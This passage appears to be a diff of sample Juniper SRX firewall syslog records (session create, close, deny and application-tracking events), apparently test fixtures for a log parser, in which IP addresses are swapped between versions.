nat-source-address="89.160.20.112" nat-source-port="63456" nat-destination-address="89.160.20.112" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "] -<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.35 source-address="89.160.20.112" source-port="24065" destination-address="81.2.69.193" destination-port="768" service-name="icmp" nat-source-address="89.160.20.112" nat-source-port="24065" nat-destination-address="81.2.69.193" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] -<14>1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2626.192.0.2.1.40 source-address="192.0.2.1" source-port="1" destination-address="89.160.20.112" destination-port="46384" service-name="icmp" nat-source-address="192.0.2.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packet-incoming-interface="ge-0/0/1.0"] -<14>1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2626.192.0.2.1.40 reason="response received" source-address="192.0.2.1" source-port="1" destination-address="89.160.20.112" destination-port="46384" service-name="icmp" nat-source-address="192.0.2.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packets-from-client="1" bytes-from-client="84" packets-from-server="1" bytes-from-server="84" elapsed-time="0" packet-incoming-interface="ge-0/0/1.0"] -<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP FIN" source-address="10.3.255.203" source-port="47776" destination-address="89.160.20.112" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="10.3.136.49" nat-source-port="19162" nat-destination-address="89.160.20.112" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"] -<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.58 reason="TCP RST" source-address="192.168.2.164" source-port="53232" destination-address="172.16.1.19" destination-port="445" service-name="junos-smb" nat-source-address="192.168.2.164" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"] -<14>1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.34 reason="idle Timeout" source-address="89.160.20.112" source-port="52890" destination-address="89.160.20.112" destination-port="53" service-name="junos-dns-udp" nat-source-address="89.160.20.112" nat-source-port="11152" nat-destination-address="89.160.20.112" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"] -<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="idle Timeout" source-address="192.168.255.2" source-port="62047" destination-address="89.160.20.112" destination-port="53" service-name="junos-dns-udp" nat-source-address="192.168.0.47" nat-source-port="20215" nat-destination-address="89.160.20.112" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" session-id-32="9621" packets-from-client="1" bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"] -<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.36 reason="application failure or action" source-address="10.164.110.223" source-port="9057" destination-address="10.104.12.161" destination-port="21" service-name="junos-ftp" nat-source-address="10.9.1.150" nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.1.1.1.2.41 source-address="81.2.69.193" source-port="3129" destination-address="89.160.20.112" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="81.2.69.193" nat-source-port="14406" nat-destination-address="89.160.20.112" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.41 source-address="81.2.69.193" source-port="3129" destination-address="89.160.20.112" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="81.2.69.193" nat-source-port="14406" nat-destination-address="89.160.20.112" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="application failure or action" source-address="81.2.69.193" source-port="3129" destination-address="89.160.20.112" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="81.2.69.193" nat-source-port="14406" nat-destination-address="89.160.20.112" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="81.2.69.193" source-port="33040" destination-address="81.2.69.193" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="81.2.69.193" nat-source-port="33040" nat-destination-address="81.2.69.193" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" elapsed-time="60" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.1.1.1.2.129 source-address="81.2.69.193" source-port="33040" destination-address="81.2.69.193" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="81.2.69.193" nat-source-port="33040" nat-destination-address="81.2.69.193" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="81.2.69.193" source-port="48873" destination-address="81.2.69.193" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="81.2.69.193" nat-source-port="48873" nat-destination-address="81.2.69.193" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.1.1.1.2.35 source-address="89.160.20.112" source-port="24065" destination-address="81.2.69.193" destination-port="768" service-name="icmp" nat-source-address="89.160.20.112" nat-source-port="24065" nat-destination-address="81.2.69.193" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] -<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.1.1.1.2.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="81.2.69.193" source-port="48873" destination-address="81.2.69.193" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="81.2.69.193" nat-source-port="48873" nat-destination-address="81.2.69.193" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="10.1.1.100" source-port="58943" destination-address="81.2.69.193" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="6018" nat-destination-address="81.2.69.193" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="idle Timeout" source-address="10.1.1.100" source-port="64720" destination-address="81.2.69.193" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="172.19.34.100" nat-source-port="24519" nat-destination-address="81.2.69.193" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.129 source-address="10.1.1.100" source-port="49583" destination-address="89.160.20.112" destination-port="53" connection-tag="0" service-name="junos-dns-udp" nat-source-address="172.19.34.100" nat-source-port="30838" nat-destination-address="89.160.20.112" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="Closed by junos-alg" source-address="10.1.1.100" source-port="63381" destination-address="89.160.20.112" destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="26764" nat-destination-address="89.160.20.112" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address="67.43.156.15" source-port="56639" destination-address="67.43.156.15" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth6.0" encrypted="No "] +<14>1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="unset" source-address="67.43.156.15" source-port="63456" destination-address="67.43.156.15" destination-port="902" service-name="None" nat-source-address="67.43.156.15" nat-source-port="63456" nat-destination-address="67.43.156.15" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "] +<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="24065" destination-address="67.43.156.14" destination-port="768" service-name="icmp" nat-source-address="67.43.156.14" nat-source-port="24065" nat-destination-address="67.43.156.14" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] +<14>1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="192.168.2.1" source-port="1" destination-address="192.168.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.168.2.1" nat-source-port="1" nat-destination-address="67.43.156.14" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packet-incoming-interface="ge-0/0/1.0"] +<14>1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="response received" source-address="192.168.2.1" source-port="1" destination-address="192.168.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.168.2.1" nat-source-port="1" nat-destination-address="67.43.156.14" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packets-from-client="1" bytes-from-client="84" packets-from-server="1" bytes-from-server="84" elapsed-time="0" packet-incoming-interface="ge-0/0/1.0"] +<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="TCP FIN" source-address="10.3.255.203" source-port="47776" destination-address="67.43.156.15" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="10.3.136.49" nat-source-port="19162" nat-destination-address="67.43.156.15" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"] +<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="TCP RST" source-address="192.168.2.164" source-port="53232" destination-address="172.16.1.19" destination-port="445" service-name="junos-smb" nat-source-address="192.168.2.164" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"] +<14>1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="67.43.156.14" source-port="52890" destination-address="67.43.156.14" destination-port="53" service-name="junos-dns-udp" nat-source-address="67.43.156.14" nat-source-port="11152" nat-destination-address="67.43.156.14" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"] +<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="192.168.255.2" source-port="62047" destination-address="67.43.156.15" destination-port="53" service-name="junos-dns-udp" nat-source-address="192.168.0.47" nat-source-port="20215" nat-destination-address="67.43.156.15" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" session-id-32="9621" packets-from-client="1" bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"] +<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="application failure or action" source-address="10.164.110.223" source-port="9057" destination-address="10.104.12.161" destination-port="21" service-name="junos-ftp" nat-source-address="10.9.1.150" nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@67.43.156.15 source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="14406" nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="14406" nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="application failure or action" source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="14406" nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="33040" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.14" nat-source-port="33040" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" elapsed-time="60" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="33040" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.14" nat-source-port="33040" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="TCP CLIENT RST" source-address="67.43.156.14" source-port="48873" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="48873" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@67.43.156.15 source-address="67.43.156.14" source-port="24065" destination-address="67.43.156.14" destination-port="768" service-name="icmp" nat-source-address="67.43.156.14" nat-source-port="24065" nat-destination-address="67.43.156.14" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] +<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@67.43.156.15 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" 